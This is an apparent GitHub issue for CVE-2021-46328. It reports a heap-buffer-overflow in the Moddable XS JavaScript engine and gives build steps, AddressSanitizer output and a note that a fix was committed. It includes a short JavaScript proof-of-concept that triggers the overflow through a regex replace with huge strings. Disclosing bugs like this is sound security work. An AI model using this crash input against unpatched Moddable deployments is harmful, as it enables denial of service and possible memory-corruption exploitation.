Headline

CVE-2021-46328: Heap-buffer-overflow in __libc_start_main · Issue #751 · Moddable-OpenSource/moddable

Moddable SDK v11.5.0 was discovered to contain a heap-buffer-overflow via the component __libc_start_main.

2 years ago

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Heap-buffer-overflow in __libc_start_main #751

Closed

hope-fly opened this issue

Dec 14, 2021

· 1 comment

Comments

@hope-fly

Moddable-XS revision

Commit: db8f973

Version: 11.5.0 32 4

Build environment

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

cd ~/moddable/xs/makefiles/lin make debug

Test case

function JSEtest(x, n) { while (x.length < n) { x += x; } return x.substring(0, n); }

var x = JSEtest("1", 1 << 20); var rep = JSEtest("$1", 1 << 16); var y = x.replace(/(.+)/g, rep); y.length;

Execution & Output

$ ./xst test.js

================================================================= ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f62dd0fe820 at pc 0x7f62e0bf477a bp 0x7ffd65c0fc60 sp 0x7ffd65c0f408 WRITE of size 1048576 at 0x7f62dd0fe820 thread T0 #0 0x7f62e0bf4779 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79779) #1 0x564bd7f19243 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #2 0x564bd7f19243 in fxPushSubstitutionString /root/moddable/xs/sources/xsString.c:1989 #3 0x564bd7e46db6 in fx_RegExp_prototype_replace /root/moddable/xs/sources/xsRegExp.c:834 #4 0x564bd7e51f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842 #5 0x564bd7f1c334 in fx_String_prototype_withRegexp /root/moddable/xs/sources/xsString.c:1675 #6 0x564bd7f1c334 in fx_String_prototype_replace /root/moddable/xs/sources/xsString.c:1120 #7 0x564bd7e51f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842 #8 0x564bd7ebcc27 in fxRunScript /root/moddable/xs/sources/xsRun.c:4766 #9 0x564bd80ce90a in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387 #10 0x564bd79f54c7 in main /root/moddable/xs/tools/xst.c:281 #11 0x7f62e01eebf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #12 0x564bd79f70c9 in _start (/root/moddable/build/bin/lin/debug/xst+0x950c9)

0x7f62dd0fe820 is located 0 bytes to the right of 16777248-byte region [0x7f62dc0fe800,0x7f62dd0fe820) allocated by thread T0 here: #0 0x7f62e0c59b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x564bd7d2fa66 in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506 #2 0x564bd7d630a3 in fxAllocate /root/moddable/xs/sources/xsMemory.c:170 #3 0x564bd7a19d9a in fxCreateMachine /root/moddable/xs/sources/xsAPI.c:1367 #4 0x564bd79f2ddf in main /root/moddable/xs/tools/xst.c:259 #5 0x7f62e01eebf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)

SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79779) Shadow bytes around the buggy address: 0x0fecdba17cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fecdba17cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fecdba17cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fecdba17ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fecdba17cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0fecdba17d00: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa 0x0fecdba17d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fecdba17d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fecdba17d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fecdba17d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fecdba17d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb

Credits: Found by OWL337 team.

mkellner pushed a commit that referenced this issue

Dec 21, 2021

@phoddie